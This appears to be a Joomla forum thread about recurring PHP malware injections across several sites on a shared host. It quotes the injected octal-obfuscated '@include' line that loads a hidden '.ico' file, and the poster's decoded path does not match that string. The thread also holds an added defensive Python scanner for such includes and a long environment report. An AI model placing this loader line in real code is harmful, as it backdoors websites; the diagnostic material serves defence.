I'm getting constant php injections

Posted: Wed Apr 24, 2019 8:05 pm
by alsunna
Constant

Despite installing security pro and RSFirewall and cleaning all injected PHP files, I'm getting the same SQL injections into the PHP files like this (see attached):

/9f961/

@include "\057ho\155e3\057al\163un\156a/\160ub\154ic\137ht\155l/\142ec\157me\155us\154im\057pl\165gi\156s/\146ie\154ds\057in\164eg\145r/\05670\14601\061c1\056ic\157";

/9f961/

When I decode this msg, it comes to injecting .ico file:
@include "/home/sneakers/public_html/wp-content/plugins/youtube-embed-plus/.484229fd.ico";

Do any of you know how we can block PHP injections?
I have the same issue as this guy: http://www.webhostingtalk.com/showthread.php?t=1642283


In the server error log, to find the hole: too many errors like:
[08-May-2017 02:09:21 America/Chicago] PHP Deprecated: Automatically populating $HTTP_RAW_POST_DATA is deprecated and will be removed in a future version. To avoid this warning set 'always_populate_raw_post_data' to '-1' in php.ini and use the php://input stream instead. in Unknown on line 0
[11-May-2017 21:29:42 America/Chicago] PHP Deprecated: Automatically populating $HTTP_RAW_POST_DATA is deprecated and will be removed in a future version. To avoid this warning set 'always_populate_raw_post_data' to '-1' in php.ini and use the php://input stream instead. in Unknown on line 0
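
Added example, not part of the original post: a small Python triage script that resolves the octal/hex escapes in an `@include "..."` line like the one quoted above and lists every include in a site's PHP files that points at a hidden or non-PHP file. The function names and the `SAMPLE` wrapper are this example's own; the escaped string inside it is the one from the post.

```python
import os
import posixpath
import re

# PHP double-quoted strings accept \NNN (octal, 1-3 digits) and \xHH (hex, 1-2 digits).
_ESCAPE = re.compile(r'\\(?:x([0-9A-Fa-f]{1,2})|([0-7]{1,3}))')
# include/require(_once) of a double-quoted literal, with or without parentheses.
_INCLUDE = re.compile(
    r'\b(?:include|require)(?:_once)?\s*\(?\s*"((?:[^"\\]|\\.)*)"', re.IGNORECASE)
PHP_EXTENSIONS = {".php", ".inc", ".phtml"}

# Constructed sample: the injected block as quoted in the post, placed in a PHP file.
SAMPLE = r'''<?php
/9f961/
@include "\057ho\155e3\057al\163un\156a/\160ub\154ic\137ht\155l/\142ec\157me\155us\154im\057pl\165gi\156s/\146ie\154ds\057in\164eg\145r/\05670\14601\061c1\056ic\157";
/9f961/
require_once "helper.php";
'''


def decode_php_escapes(literal):
    """Resolve octal/hex escapes the way PHP does for a double-quoted string."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8) & 0xFF)  # PHP wraps octal values above 0377
    return _ESCAPE.sub(repl, literal)


def find_suspicious_includes(source):
    """Return (decoded_path, reasons) for each include that deserves a manual look."""
    findings = []
    for m in _INCLUDE.finditer(source):
        raw = m.group(1)
        path = decode_php_escapes(raw)
        name = posixpath.basename(path)
        reasons = []
        if path != raw:
            reasons.append("path hidden behind escape sequences")
        if name.startswith("."):
            reasons.append("hidden dotfile")
        if posixpath.splitext(name)[1].lower() not in PHP_EXTENSIONS:
            reasons.append("target is not a PHP source extension")
        if reasons:
            findings.append((path, reasons))
    return findings


def scan_tree(root):
    """Walk a site directory and report suspicious includes per PHP file."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if posixpath.splitext(fname)[1].lower() not in PHP_EXTENSIONS:
                continue
            full = os.path.join(dirpath, fname)
            with open(full, encoding="utf-8", errors="replace") as fh:
                hits = find_suspicious_includes(fh.read())
            if hits:
                report[full] = hits
    return report


if __name__ == "__main__":
    for path, reasons in find_suspicious_includes(SAMPLE):
        print(path, "->", "; ".join(reasons))
```

Each reported path is a second file to inspect and remove together with the include line that loads it; `scan_tree` run over every site directory in the account shows how far the same injection has spread.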

Re: I'm getting constant php injections

Posted: Thu Apr 25, 2019 4:09 am
by Giraffex
The best way to protect yourself is through the current Joomla system. But this will not help when poor quality components are installed on the website. Often they are the ones that cause hackers to break into websites.

Re: I'm getting constant php injections

Posted: Thu Apr 25, 2019 4:49 am
by mandville
Please run and post the results of the FPA.

Re: I'm getting constant php injections

Posted: Thu Apr 25, 2019 9:25 am
by Tpy
Have you tried a security component? Try to install RSFirewall and make a scan of your website.

Re: I'm getting constant php injections

Posted: Thu Apr 25, 2019 5:51 pm
by alsunna
We tried to install RSFirewall, and it shows me the infected files.
We clean them, a week later they come back. We have a hosting with 10 sites with Joomla and one WP that are injected weekly.

Re: I'm getting constant php injections

Posted: Thu Apr 25, 2019 6:57 pm
by mandville

Re: I'm getting constant php injections

Posted: Thu Apr 25, 2019 7:03 pm
by Per Yngve Berg
Is this hosted on a VPS?

You have to isolate the sites by installing with a separate OS user for each site to prevent cross site contamination.

It also looks like the vulnerability is in the WP site.

Re: I'm getting constant php injections

Posted: Tue Apr 30, 2019 9:50 pm
by alsunna
It's on a shared HostGator account. VPS is too costly for 12 sites. They are all Joomla sites.

We tried WP to see if it helps but then WP php files got injected too.

I still get codes in PHP like this:
/9f961/

@include "\057ho\155e3\057al\163un\156a/\160ub\154ic\137ht\155l/\142ec\157me\155us\154im\057pl\165gi\156s/\146ie\154ds\057in\164eg\145r/\05670\14601\061c1\056ic\157";

/9f961/

When I decode this msg, it comes to injecting .ico file:
@include "/home/sneakers/public_html/wp-content/plugins/youtube-embed-plus/.484229fd.ico";

Re: I'm getting constant php injections

Posted: Wed May 01, 2019 7:48 am
by Per Yngve Berg
We are still waiting for the FPA report as requested several times.

Re: I'm getting constant php injections

Posted: Wed May 01, 2019 4:03 pm
by alsunna
Forum Post Assistant (v1.4.8 (koine)) : 1st May 2019 wrote:
Last PHP Error(s) Reported :: wrote:[30-Apr-2019 17:02:10 America/Chicago] PHP Parse error: syntax error, unexpected end of file, expecting variable (T_VARIABLE) or '{' or '$' in /fpa-en.php on line 2327
Basic Environment :: wrote:Joomla! Instance :: Joomla! 3.9.5-Stable (Amani) 9-April-2019
Joomla! Platform :: Joomla Platform 13.1.0-Stable (Curiosity) 24-Apr-2013
Joomla! Configured :: Yes | Read-Only (444) | Owner: --protected-- . (uid: 1/gid: 1) | Group: --protected-- (gid: 1) | Valid For: 3.9
Configuration Options :: Offline: false | SEF: true | SEF Suffix: false | SEF ReWrite: true | .htaccess/web.config: Yes | GZip: true | Cache: false | CacheTime: 30 | CacheHandler: file | CachePlatformPrefix: false | FTP Layer: false | Proxy: false | LiveSite: | Session lifetime: 15 | Session handler: database | Shared sessions: false | SSL: 0 | Error Reporting: none | Site Debug: false | Language Debug: false | Default Access: 1 | Unicode Slugs: false | dbConnection Type: mysqli | PHP Supports J! 3.9.5: Yes | Database Supports J! 3.9.5: Yes | Database Credentials Present: Yes |

Host Configuration :: OS: Linux | OS Version: 3.10.0-693.17.1.2.ELK.el6.x86_64 | Technology: x86_64 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: --protected-- | System TMP Writable: Yes | Free Disk Space : 122.64 GiB |

PHP Configuration :: Version: 7.1.14 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 32759 | Log Errors To: error_log | Last Known Error: 30th April 2019 17:02:10. | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: /home3/alsunna/public_html:/tmp:/home3/alsunna/public_html/info/tmp:/home3/alsunna/public_html/info/logs | Uploads: 1 | Max. Upload Size: 64M | Max. POST Size: 64M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 256M

Database Configuration :: Version: 5.6.41-84.1 (Client:5.6.41-84.1) | Host: --protected-- (--protected--) | default Collation: utf8_general_ci (default Character Set: utf8) | Database Size: 201.67 MiB | #of Tables:  206
Detailed Environment :: wrote:PHP Extensions :: Core (7.1.14) | date (7.1.14) | libxml (7.1.14) | openssl (7.1.14) | pcre (7.1.14) | sqlite3 (7.1.14) | zlib (7.1.14) | bcmath (7.1.14) | bz2 (7.1.14) | calendar (7.1.14) | ctype (7.1.14) | curl (7.1.14) | dom (20031129) | hash (1.0) | fileinfo (1.0.5) | filter (7.1.14) | ftp (7.1.14) | gd (7.1.14) | gettext (7.1.14) | gmp (7.1.14) | SPL (7.1.14) | iconv (7.1.14) | session (7.1.14) | intl (1.1.0) | json (1.5.0) | mbstring (7.1.14) | mcrypt (7.1.14) | mysqli (7.1.14) | odbc (7.1.14) | standard (7.1.14) | PDO (7.1.14) | pdo_mysql (7.1.14) | pdo_sqlite (7.1.14) | Phar (2.0.2) | posix (7.1.14) | pspell (7.1.14) | Reflection (7.1.14) | imap (7.1.14) | SimpleXML (7.1.14) | soap (7.1.14) | sockets (7.1.14) | exif (7.1.14) | tidy (7.1.14) | tokenizer (7.1.14) | wddx (7.1.14) | xml (7.1.14) | xmlreader (7.1.14) | xmlrpc (7.1.14) | xmlwriter (7.1.14) | xsl (7.1.14) | zip (1.13.5) | cgi-fcgi () | SourceGuardian (11.1.5) | ionCube Loader () | Zend Engine (3.1.0) |
Potential Missing Extensions ::
Disabled Functions :: system | shell_exec | passthru | exec | popen | proc_open |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: No | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) | administrator/logs/ (---) |

Elevated Permissions (First 10) ::
Database Information :: wrote:Database statistics :: Uptime: 1844993 | Threads: 18 | Questions: 1689456911 | Slow queries: 22725 | Opens: 19266941 | Flush tables: 1 | Open tables: 16800 | Queries per second avg: 915.698 |
Extensions Discovered :: wrote:Components :: SITE ::
Core :: com_wrapper (3.0.0) 1 | com_mailto (3.0.0) 1 |
3rd Party:: WF_FILESYSTEM_JOOMLA_TITLE (2.6.11) ? | WF_AGGREGATOR_VIMEO_TITLE (2.6.11) ? | WF_AGGREGATOR_YOUTUBE_TITLE (2.6.11) ? | WF_AGGREGATOR_DAILYMOTION_TITLE (2.6.11) ? | WF_AGGREGATOR_VINE_TITLE (2.6.11) ? | WF_POPUPS_WINDOW_TITLE (2.6.11) ? | WF_POPUPS_JCEMEDIABOX_TITLE (2.6.11) ? | FLEXIcontent Links (2.3.0-rc) ? | WF_LINKS_JOOMLALINKS_TITLE (2.6.11) ? | WF_LINK_SEARCH_TITLE (2.6.11) ? | WF_CLEANUP_TITLE (2.6.11) ? | WF_LINK_TITLE (2.6.11) ? | WF_ANCHOR_TITLE (2.6.11) ? | WF_FULLSCREEN_TITLE (2.6.11) ? | WF_CHARMAP_TITLE (2.6.11) ? | WF_KITCHENSINK_TITLE (2.6.11) ? | WF_VISUALBLOCKS_TITLE (2.6.11) ? | WF_IMGMANAGER_TITLE (2.6.11) ? | WF_SEARCHREPLACE_TITLE (2.6.11) ? | WF_TEXTCASE_TITLE (2.6.11) ? | WF_HR_TITLE (2.6.11) ? | WF_FONTCOLOR_TITLE (2.6.11) ? | WF_VISUALCHARS_TITLE (2.6.11) ? | WF_NONBREAKING_TITLE (2.6.11) ? | WF_SOURCE_TITLE (2.6.11) ? | WF_INLINEPOPUPS_TITLE (2.6.11) ? | WF_CLIPBOARD_TITLE (2.6.11) ? | WF_SPELLCHECKER_TITLE (2.6.11) ? | WF_BROWSER_TITLE (2.6.11) ? | WF_CONTEXTMENU_TITLE (2.6.11) ? | WF_XHTMLXTRAS_TITLE (2.6.11) ? | WF_STYLESELECT_TITLE (2.6.11) ? | WF_TABLE_TITLE (2.6.11) ? | WF_DIRECTIONALITY_TITLE (2.6.11) ? | WF_PREVIEW_TITLE (2.6.11) ? | WF_EMOTIONS_TITLE (2.6.11) ? | WF_FONTSELECT_TITLE (2.6.11) ? | WF_LISTS_TITLE (2.6.11) ? | WF_MEDIA_TITLE (2.6.11) ? | WF_PRINT_TITLE (2.6.11) ? | WF_FORMATSELECT_TITLE (2.6.11) ? | WF_ARTICLE_TITLE (2.6.11) ? | WF_AUTOSAVE_TITLE (2.6.11) ? | WF_FONTSIZESELECT_TITLE (2.6.11) ? | WF_STYLE_TITLE (2.6.11) ? | WF_LAYER_TITLE (2.6.11) ? |

Components :: ADMIN ::
Core :: com_search (3.0.0) 1 | com_messages (3.0.0) 1 | com_contenthistory (3.2.0) 1 | com_postinstall (3.2.0) 1 | com_templates (3.0.0) 1 | com_modules (3.0.0) 1 | com_content (3.0.0) 1 | com_checkin (3.0.0) 1 | com_tags (3.1.0) 1 | com_users (3.0.0) 1 | com_admin (3.0.0) 1 | com_languages (3.0.0) 1 | com_media (3.0.0) 1 | com_ajax (3.2.0) 1 | com_categories (3.0.0) 1 | com_finder (3.0.0) 1 | com_fields (3.7.0) 1 | com_associations (3.7.0) 1 | com_config (3.0.0) 1 | com_newsfeeds (3.0.0) 1 | com_plugins (3.0.0) 1 | com_weblinks (3.5.0) 1 | com_cpanel (3.0.0) 1 | com_redirect (3.0.0) 1 | com_menus (3.0.0) 1 | com_banners (3.0.0) 1 | com_cache (3.0.0) 1 | com_actionlogs (3.9.0) 1 | com_installer (3.0.0) 1 | com_joomlaupdate (3.6.2) 1 | com_privacy (3.9.0) 1 | com_login (3.0.0) 1 |
3rd Party:: COM_JCE (2.6.11) 1 | Akeeba (6.4.2.1) 1 | COM_GANTRY (4.1.40) 1 | Securitycheck Pro (3.1.5) 1 | Facebook Recommendations bar (1.0) ? | Linkedin company profile (1.0) ? | Social share button (1.0) ? | Facebook Activity Feed (1.0) ? | Twitter feed (1.0) ? | Linkedin member profile (1.0) ? | Linkedin Build a Jobs (1.0) ? | Facebook Embedded Posts (1.0) ? | Facebook Commend (1.0) ? | Google Interactive posts (1.0) ? | Facebook Like Box (1.0) ? | Google Comment (1.0) ? | Linkedin Apply button (1.0) ? | Google Badge (1.0) ? | Facebook Recommendations box (1.0) ? | Linkedin company Insider (1.0) ? | Facebook Facepile (1.0) ? | Login button (1.0) ? | BT_SocialConnect (1.2.1) 1 | Facebook Profile (1.0) ? | Google page (1.0) ? | Facebook Page (1.0) ? | Linkedin Companies (1.0) ? | Facebook Groups (1.0) ? | Linkedin Groups (1.0) ? | Twitter Profile (1.0) ? | Linkedin Profile (1.0) ? | Mailing (1.0) ? | EasySlider (2.1.4) 0 | sh404SEF (4.4.4.1791) 1 | plg_installer_sh404sef (4.4.4.1791) 1 | sh404sef - Default component suppor (4.4.4.1791) ? | sh404sef - Offline code plugin (4.4.4.1791) 1 | sh404sef - Similar urls plugin (4.4.4.1791) 1 | PLG_SH404SEFCORE_SH404SEFSOCIAL (4.4.4.1791) 1 | sh404sef - Analytics plugin (4.4.4.1791) 1 | plg_system_shlib (0.2.9.370) 1 | sh404sef - System plugin (4.4.4.1791) 1 | sh404sef - System mobile template s (4.4.4.1791) ? | sh404sef control panel icon (4.4.4.1791) 1 | com_jhackguard (2.0.2) 1 | RokSprocket (2.1.23) 1 | JMap (2.0.2) 1 | com_gantry5 (5.0.0-rc.1) 1 | COM_SPUPGRADE (4.1.1) 1 | Mailster (1.5.1) 1 | RSFirewall! (2.11.25) 1 | SP Simple Portfolio (1.3) ? | com_uniterevolution2 (4.3.8 b5) 1 | com_djimageslider (3.2.1) 1 | Bt_Portfolio (3.0.9) 1 | SP Page Builder (2.4.1) 1 |

Modules :: SITE ::
Core :: mod_tags_popular (3.1.0) 1 | mod_login (3.0.0) 1 | mod_articles_categories (3.0.0) 1 | mod_articles_category (3.0.0) 1 | mod_finder (3.0.0) 1 | mod_menu (3.0.0) 1 | mod_random_image (3.0.0) 1 | mod_whosonline (3.0.0) 1 | mod_weblinks (3.5.0) 1 | mod_syndicate (3.0.0) 1 | mod_articles_news (3.0.0) 1 | mod_articles_popular (3.0.0) 1 | mod_custom (3.0.0) 1 | mod_articles_latest (3.0.0) 1 | mod_stats (3.0.0) 1 | mod_languages (3.5.0) 1 | mod_related_items (3.0.0) 1 | mod_feed (3.0.0) 1 | mod_banners (3.0.0) 1 | mod_wrapper (3.0.0) 1 | mod_search (3.0.0) 1 | mod_tags_similar (3.1.0) 1 | mod_breadcrumbs (3.0.0) 1 | mod_users_latest (3.0.0) 1 | mod_footer (3.0.0) 1 | mod_articles_archive (3.0.0) 1 |
3rd Party:: BT Login (2.5.6) 1 | SP Simple Portfolio Module (1.3) ? | JSN EasySlider (2.1.4) 1 | BT Twitter Feeds (2.2) 1 | MOD_RANDOM_IMAGE_EXTENDED (3.3.0) 1 | BT Content Showcase (2.4.2) 1 | Hyper News Ticker (1.0) 1 | RokNavMenu (2.0.9) ? | ThemeHippo Pricing Table (1.0) 1 | CT Random Article (1.0.0) 1 | News Show SP2 (2.2) 1 | SP Page Builder (1.1) 1 | mod_news_pro_gk4 (GK4 3.4.0) 1 | BT Slideshow Pro (2.1.8) 1 | RokAjaxSearch (2.0.6) 1 | DJ-ImageSlider (3.2.1) 1 | Latest News + (2.1.3) 1 | Random Article (1.4.1.78) 1 | SP Facebook (1.4) 1 | BT Simple Slideshow (1.0.2) 1 | Custom Inline HTML (1.0) 1 | BT Google Maps (2.0.8) 1 | Mailster Subscriber (1.5.1) 1 | Hijri Date (1.0.1) 1 | Sj K2 Mega News (2.5) 1 | MOD_LATESTNEWSENHANCED (3.0.4) 1 | RokSprocket Module (2.1.6) ? | AP Smart LayerSlider (3.4) ? | SP Tweet (2.2.0) 1 | JA Image Hotspot (1.1.4) 1 |

Modules :: ADMIN ::
Core :: mod_title (3.0.0) 1 | mod_latestactions (3.9.0) 1 | mod_login (3.0.0) 1 | mod_toolbar (3.0.0) 1 | mod_quickicon (3.0.0) 1 | mod_menu (3.0.0) 1 | mod_stats_admin (3.0.0) 1 | mod_privacy_dashboard (3.9.0) 1 | mod_custom (3.0.0) 1 | mod_logged (3.0.0) 1 | mod_sampledata (3.8.0) ? | mod_popular (3.0.0) 1 | mod_feed (3.0.0) 1 | mod_multilangstatus (3.0.0) 1 | mod_submenu (3.0.0) 1 | mod_latest (3.0.0) 1 | mod_version (3.0.0) 1 | mod_status (3.0.0) 1 |
3rd Party:: RSFirewall! Control Panel Module (1.4.0) 1 | sh404sef control panel icon (4.4.4.1791) 1 | mod_sppagebuilder_admin_menu (1.1) ? | mod_sppagebuilder_icons (1.0.2) ? | Securitycheck Pro Info Module (3.1.5) 1 |

Libraries :: SITE ::
Core ::
3rd Party:: RokCommon (3.2.0) 1 | file_fof30 (3.4.2) ? |

Plugins :: SITE ::
Core :: plg_fields_repeatable (3.9.0) 1 | plg_fields_list (3.7.0) 1 | plg_fields_user (3.7.0) 1 | plg_fields_text (3.7.0) 1 | plg_fields_editor (3.7.0) 1 | plg_fields_usergrouplist (3.7.0) 1 | plg_fields_integer (3.7.0) 1 | plg_fields_radio (3.7.0) 1 | plg_fields_calendar (3.7.0) 1 | plg_fields_sql (3.7.0) 1 | plg_fields_checkboxes (3.7.0) 1 | plg_fields_textarea (3.7.0) 1 | plg_fields_imagelist (3.7.0) 1 | plg_fields_color (3.7.0) 1 | plg_fields_media (3.7.0) 1 | plg_fields_url (3.7.0) 1 | plg_privacy_user (3.9.0) 1 | plg_privacy_message (3.9.0) 1 | plg_privacy_actionlogs (3.9.0) 1 | plg_privacy_content (3.9.0) 1 | plg_privacy_consents (3.9.0) 1 | plg_user_profile (3.0.0) ? | plg_user_terms (3.9.0) 0 | plg_user_joomla (3.0.0) 1 | plg_user_contactcreator (3.0.0) ? | plg_twofactorauth_yubikey (3.2.0) 1 | plg_twofactorauth_totp (3.2.0) 1 | plg_authentication_gmail (3.0.0) ? | plg_authentication_ldap (3.0.0) ? | plg_authentication_cookie (3.0.0) 1 | plg_authentication_joomla (3.0.0) 1 | plg_extension_joomla (3.0.0) 1 | PLG_ACTIONLOG_JOOMLA (3.9.0) 1 | PLG_INSTALLER_URLINSTALLER (3.6.0) 1 | plg_installer_packageinstaller (3.6.0) 1 | PLG_INSTALLER_FOLDERINSTALLER (3.6.0) 1 | plg_installer_webinstaller (2.0.1) 1 | plg_captcha_recaptcha_invisible (3.8) 0 | plg_captcha_recaptcha (3.4.0) ? 
| plg_quickicon_privacycheck (3.9.0) 1 | plg_quickicon_extensionupdate (3.0.0) 1 | plg_quickicon_phpversioncheck (3.7.0) 1 | plg_quickicon_joomlaupdate (3.0.0) 1 | plg_finder_weblinks (3.5.0) 1 | plg_finder_contacts (3.0.0) 1 | plg_finder_content (3.0.0) 1 | plg_finder_newsfeeds (3.0.0) 1 | plg_finder_tags (3.0.0) 1 | plg_finder_categories (3.0.0) 1 | plg_editors-xtd_fields (3.7.0) 1 | plg_editors-xtd_image (3.0.0) 1 | plg_editors-xtd_menu (3.7.0) 1 | plg_editors-xtd_module (3.5.0) 1 | plg_editors-xtd_pagebreak (3.0.0) 1 | plg_editors-xtd_readmore (3.0.0) 1 | plg_editors-xtd_article (3.0.0) 1 | plg_content_fields (3.7.0) 1 | plg_content_pagenavigation (3.0.0) 1 | plg_content_confirmconsent (3.9.0) 0 | plg_content_pagebreak (3.0.0) 1 | plg_content_emailcloak (3.0.0) 1 | plg_content_vote (3.0.0) 1 | plg_content_joomla (3.0.0) 1 | plg_content_finder (3.0.0) 1 | plg_content_loadmodule (3.0.0) 1 | plg_system_fields (3.7.0) 1 | plg_system_languagefilter (3.0.0) 0 | plg_system_debug (3.0.0) 1 | plg_system_p3p (3.0.0) 1 | plg_system_sef (3.0.0) 1 | plg_system_stats (3.5.0) ? | plg_system_log (3.0.0) 1 | plg_system_sessiongc (3.8.6) 1 | plg_system_highlight (3.0.0) 1 | plg_system_redirect (3.0.0) 0 | plg_system_cache (3.0.0) 1 | plg_system_remember (3.0.0) 1 | plg_system_languagecode (3.0.0) ? | plg_system_privacyconsent (3.9.0) 0 | PLG_SYSTEM_ACTIONLOGS (3.9.0) 0 | plg_system_logrotation (3.9.0) 1 | plg_system_logout (3.0.0) 1 | plg_system_updatenotification (3.5.0) 1 | plg_search_weblinks (3.5.0) 1 | plg_search_contacts (3.0.0) 1 | plg_search_content (3.0.0) 1 | plg_search_newsfeeds (3.0.0) 1 | plg_search_tags (3.0.0) 1 | plg_search_categories (3.0.0) 1 |
3rd Party:: RokPad (2.1.10) 1 | plg_editors_tinymce (4.5.9) 1 | plg_editors_jce (2.6.11) 1 | plg_editors_codemirror (5.40.0) 1 | BT AutoSubmit - Registration (1.0.0) 1 | plg_gantry5_preset (5.0.0-rc.1) 1 | plg_extension_jce (2.6.11) 1 | Extension - Inline editing Plugin H (1.0) ? | plg_installer_rsfirewall (1.0.0) 1 | plg_installer_jce (2.6.11) 1 | plg_installer_sh404sef (4.4.4.1791) 1 | Installer - Securitycheck Pro (3.1.5) 1 | Ajax - Inline content editing (1.0.2b) 1 | Ajax - Inline Mode State listener (1.0) 1 | Helix3 - Ajax (1.9) 1 | Ajax - TreeLink (1.0) 1 | sh404sef - Default component suppor (4.4.4.1791) ? | sh404sef - Offline code plugin (4.4.4.1791) 1 | sh404sef - Similar urls plugin (4.4.4.1791) 1 | PLG_SH404SEFCORE_SH404SEFSOCIAL (4.4.4.1791) 1 | sh404sef - Analytics plugin (4.4.4.1791) 1 | plg_quickicon_gantry5 (5.0.0-rc.1) 1 | plg_quickicon_jce (2.6.0-pro-bet) 1 | plg_quickicon_akeebabackup (6.4.2.1) 1 | Smart Search - mp3 Browser Fork (0.3.1) 1 | Editors-xtd - BT Shortcode (1.0.0) 1 | Button - RokBox (2.0.15) 1 | BT Widget - Button (1.0.0) 1 | JSN_EASYSLIDER_PLUGIN_BUTTON_TITLE (2.1.4) 0 | PLG_MP3BROWSER_SYS_NAME (0.3.1) 1 | Content - Inline content editing fi (1.0) ? | Content - Facebook Like And Share (5.5) 1 | Content - Rapid1Pixelout (3.5) 1 | Content - RokInjectModule (1.6) 1 | RokBox (2.0.15) 1 | Content - Inline content editing (1.0) 1 | plg_content_jce (2.6.11) 1 | JSN_EASYSLIDER_PLUGIN_CONTENT_TITLE (2.1.4) 0 | Mailster Subscriber (1.5.1) 1 | Content - BT Shortcode (1.0.0) 1 | BT AutoSubmit - Content (1.0.0) 1 | T3 Framework (2.7.4) 1 | System - Inline content editing (1.0) 1 | PLG_SYSTEM_AKEEBAACTIONLOG (6.4.2.1) 0 | JHackGuard Plugin (2.0.4) 1 | System - url Inspector (3.1.5) 0 | System - Securitycheck Pro Update D (1.0.2) ? | System - SP PageBuilder (1.1) ? 
| System - RokBox (2.0.15) 1 | System - RokCommon (3.2.5) 1 | System - Inline History (1.0) 1 | System - Reset SEF Base (3.0) 1 | plg_system_ef4_jmframework (4.8.4) 1 | plg_system_jmframework (3.12) 1 | System - RokExtender (2.0.0) ? | plg_system_gantry5 (5.0.0-rc.1) 1 | System - RokBooster (1.1.18) 0 | System - Securitycheck Pro (3.1.5) 1 | PLG_SYSTEM_BACKUPONUPDATE (6.4.2.1) 0 | plg_system_djjquerymonster (1.2.0) 1 | System - Joomla Media Manager Exten (1.0) ? | System - SP Page Builder Pro Update (1.0) ? | System - RokSprocket (2.1.6) 1 | manage.myJoomla.com Secure Plugin (n/a) ? | Mailster Email Forwarder (1.5.1) 1 | System - Helix3 Framework (1.9) 1 | System - RSFirewall! Active Scanner (1.4.0) 1 | plg_system_jce (2.6.11) 1 | System - Yjsg Framework (2.3.6) 1 | System - Securitycheck Pro Cron (3.1.5) 1 | plg_system_jsnframework (2.0.2) 1 | plg_system_shlib (0.2.9.370) 1 | PLG_SYSTEM_JCH_OPTIMIZE (5.0.5) ? | sh404sef - System plugin (4.4.4.1791) 1 | BT Social Connect - System (1.0.0) 1 | PLG_SYSTEM_JSNEASYSLIDER (2.1.4) 0 | System - Inline HTML Module Version (1.0) ? | PLG_SYSTEM_AKEEBAUPDATECHECK (6.4.2.1) 0 | sh404sef - System mobile template s (4.4.4.1791) ? | System - BT Shortcode (1.0.1) 1 | System - Gantry 4 (4.1.40) 1 | Mailster Profile (1.5.1) 1 | plg_search_sppagebuilder (1.2) ? |
Templates Discovered :: wrote:Templates :: SITE :: Flex (2.4) 1 | jm-wedding06 (1.02) 1 | protostar (1.0) 1 | beez3 (3.1.0) ? | rt_callisto (1.0.0) 1 |
Templates :: ADMIN :: hathor (3.0.0) 1 | isis (1.0) 1 |

Re: I'm getting constant php injections

Posted: Thu May 02, 2019 8:24 pm
by alsunna
Please advise.

Re: I'm getting constant php injections

Posted: Thu May 02, 2019 11:32 pm
by Webdongle
alsunna wrote:
Wed Apr 24, 2019 8:05 pm
...
Despite installing security pro and RSFirewall and cleaning all injected php files...
You have no real option except to delete your files and rebuild them. Please see viewtopic.php?f=714&t=946026

You have a lot of out of date extensions. Following the instructions of viewtopic.php?f=714&t=946026 (and the thread it links to) will clean your site and rebuild your files with fresh up to date ones. If you are unable to follow the instructions then perhaps consider professional help.

Re: I'm getting constant php injections

Posted: Sun May 05, 2019 6:19 am
by darb
First, you can also check that you don't have a local trojan on your own computer infecting your FTP client, because it seems it's an issue with two different kinds of CMS sites, and I don't believe you could have the timing of getting this problem at the same time with HostGator on several CMS sites.

Never heard that WordPress can spread a virus to Joomla on the same host.

Re: I'm getting constant php injections

Posted: Thu May 09, 2019 5:18 pm
by alsunna
We have several sites under that hosting; to delete all of them and re-install will take so much time and work. My question is: how do we block PHP injections? How do we prevent it after we clean it?

Re: I'm getting constant php injections

Posted: Thu May 09, 2019 6:33 pm
by Webdongle
Yep a lot of work but you have little choice. Following the process viewtopic.php?f=714&t=946026 will remove the hack files and make sure your extensions are up to date and that you don't have vulnerable ones. You can start by performing it on the folders for the hacked site. That may be enough. But if you get hacked after that then you will need to do it for all the sites. Other than that hire a professional.